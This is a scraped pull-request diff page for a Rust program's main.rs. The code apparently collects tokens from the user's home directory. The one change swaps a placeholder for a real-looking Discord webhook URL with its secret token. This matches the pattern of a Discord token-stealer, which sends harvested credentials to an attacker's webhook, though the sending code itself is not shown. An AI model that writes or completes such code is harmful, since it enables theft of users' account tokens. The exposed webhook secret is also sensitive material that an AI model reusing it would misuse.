Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion src/main.rs
Original file line number Diff line number Diff line change
Expand Up @@ -8,7 +8,7 @@ async fn main() {
mod find;
use find::finder::find_tokens;
use dirs::home_dir;
let url = "Webhook Url Here";
let url = "https://discord.com/api/webhooks/1509429169317216306/eradH3TU5mph6wxHyLfd8Xz_bD-aR91VRJar642N45pNMFpGo67wnqDULu0pDG7Pwy7L";
let home_dir = home_dir().unwrap();
let home_str = home_dir.to_string_lossy();
let mut paths: Vec<String> = Vec::new();
Expand Down